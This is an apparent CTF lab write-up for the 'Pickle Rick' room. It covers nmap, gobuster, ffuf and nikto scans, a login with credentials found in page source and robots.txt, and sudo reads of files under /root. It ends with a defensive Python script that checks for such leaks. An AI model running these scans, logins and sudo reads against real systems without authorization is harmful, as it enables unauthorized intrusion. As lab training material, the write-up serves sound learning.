Pickle Rick


Last updated 6 months ago

subl Readme.md - creates a README file

s1: nmap scan: nmap -sC -sV -oN nmap.txt 10.10.221.23 (-oN needs an output file name before the target; nmap.txt is an example name)

visit webpage: 10.10.221.23

review source code, found username: R1ckRul3s

run gobuster scan to find directories: gobuster dir -u http://10.10.221.23/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.zip

OR

ffuf -u http://10.10.221.23/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.php,.zip

Directories found:

/login.php (Status: 200)
/assets (Status: 301)
/portal.php (Status: 302)
/robots.txt (Status: 200)
/denied.php (Status: 302)
/server-status (Status: 403)
/clue.txt (Status: 200)

perform a nikto scan: nikto -h ip_domain_name

results: "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).

/login.php: Admin login page/section found.

visiting robots.txt : the text Wubbalubbadubdub was found.

visit /login.php, use username: R1ckRul3s, password: Wubbalubbadubdub

use ls to list files

use less Sup3rS3cretPickl3Ingred.txt to reveal first ingredient.

less clue.txt: look around file system for other ingredient.

cd /home/rick; ls; pwd | result: second ingredients /home/rick

less /home/rick/"second ingredients" | result: 1 jerry tear

run sudo ls /root | result: 3rd.txt

run sudo less /root/3rd.txt | result: 3rd ingredients: fleeb juice
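The two findings that opened the login (a username in the page source and a stray string in robots.txt) are the kind of leak a site owner can catch before publishing. The check below is an added example, not part of the original notes: the function names, the keyword list and the sample inputs are assumptions, and the samples are constructed (the notes do not say the username sat in an HTML comment).

```python
import re
from html.parser import HTMLParser

# Field names normally seen in robots.txt (RFC 9309 plus common extensions).
KNOWN_FIELDS = {"user-agent", "allow", "disallow", "sitemap", "crawl-delay", "host"}

# Assumed keyword list for comments that deserve a manual look.
SENSITIVE = re.compile(r"\b(user(name)?|pass(word|wd)?|login|secret|token|key)\b", re.I)


def robots_non_directives(text):
    """Return robots.txt lines that are not blank, comments or known directives."""
    odd = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop trailing comments
        if not line:
            continue
        field, sep, _ = line.partition(":")
        if not sep or field.strip().lower() not in KNOWN_FIELDS:
            odd.append(raw.strip())
    return odd


class _CommentCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data.strip())


def sensitive_comments(html):
    """Return HTML comments whose text matches the SENSITIVE keyword list."""
    collector = _CommentCollector()
    collector.feed(html)
    collector.close()
    return [c for c in collector.comments if SENSITIVE.search(c)]


# Constructed samples: values taken from the notes, surrounding markup invented.
SAMPLE_ROBOTS = "Wubbalubbadubdub\n"
SAMPLE_HTML = "<html><body><h1>Site</h1>\n<!-- Username: R1ckRul3s -->\n<!-- layout: two columns -->\n</body></html>"

if __name__ == "__main__":
    for line in robots_non_directives(SAMPLE_ROBOTS):
        print("robots.txt non-directive line:", line)
    for comment in sensitive_comments(SAMPLE_HTML):
        print("HTML comment to review:", comment)
```

Run against the built site's output directory before deployment; any hit is a line to remove or justify.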
